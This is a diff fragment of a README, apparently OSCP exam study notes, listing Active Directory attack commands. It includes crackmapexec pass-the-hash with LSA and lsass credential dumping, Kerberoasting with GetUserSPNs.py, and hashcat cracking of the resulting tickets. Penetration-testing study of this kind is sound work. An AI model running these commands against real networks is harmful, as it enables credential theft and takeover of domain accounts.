AbdullahZuhair21/OSCP-Notes/README.md

 .          crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth -lsa    (dump lsa or local security authority. it may have some sensitive information)
 .          crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth -M lsassy    (dump lsass. it may have some secret credentials that secretdump didn't reflect)
-.          cmedb     (crackmapexec database)
+.          cmedb     (crackmapexec database) Kerberoasting
+.          python GetUserSPNs.py <domain/username:password> -dc-ip <ip of DC> -request     (attacking service accounts. from the enumeration find the service accounts that are in the admin group. you can use ldapdomaindump or bloodhound)
+.          hashcat -m 13100 kerberoast.txt rockyou.txt
+Token Impersonation
+.          check token impersonation in the Windows Privilege escalation section .
+.
 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Platforms
 1. for Initial Access work on eJPT, This article and official content